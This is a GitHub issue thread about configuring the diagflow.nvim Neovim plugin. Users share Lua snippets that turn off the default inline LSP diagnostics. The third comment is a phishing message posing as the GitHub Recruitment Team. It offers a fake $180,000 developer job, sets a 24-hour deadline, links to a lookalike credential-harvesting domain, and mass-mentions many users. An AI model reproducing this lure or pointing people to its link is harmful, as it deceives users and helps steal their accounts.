### ISSUE TITLE
usage with lspconfig

### ISSUE THREAD

**Issue by nilsherzig** [dgagn/diagflow.nvim#33]
Thanks for your plugin, i had to add this to my lua config to hide the "original" inline messages 

```lua
vim.lsp.handlers["textDocument/publishDiagnostics"] = vim.lsp.with(
    vim.lsp.diagnostic.on_publish_diagnostics, {
        virtual_text = false
    }
)
``` 

otherwise, it would display both

**Comment by daUnknownCoder** [comment]
add this snippet instead : 
```lua
      vim.diagnostic.config({
        virtual_text = false,
        virtual_lines = true,
      })
```
i just did this in my lspconfig.lua and it works while my diagflow config is : 
```lua
      diagflow.setup({
        enable = function()
          return vim.bo.filetype ~= "lazy"
        end,
        format = function(diagnostic)
          return "[Diagnostics] " .. diagnostic.message
        end,
        scope = "line",
        show_sign = true,
        padding_right = 1,
        gap = 3,
        toggle_event = { "InsertEnter" },
      })
```

**Comment by pavana21** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
liaopeiyuan, @The-Skas, @sparoj1377, @oushu1zhangxiangxuan1, @jakistra, @f0kes, @Urbanoid, @garciacaleb904, @dgagn, @BillyPan, @ivankitanovski, @taariq, @ifavo, @sfter, @fightingdreamer, @choltha, @HungYangChang, @BenWhiteJam, @hakabane, @transitive-bullshit
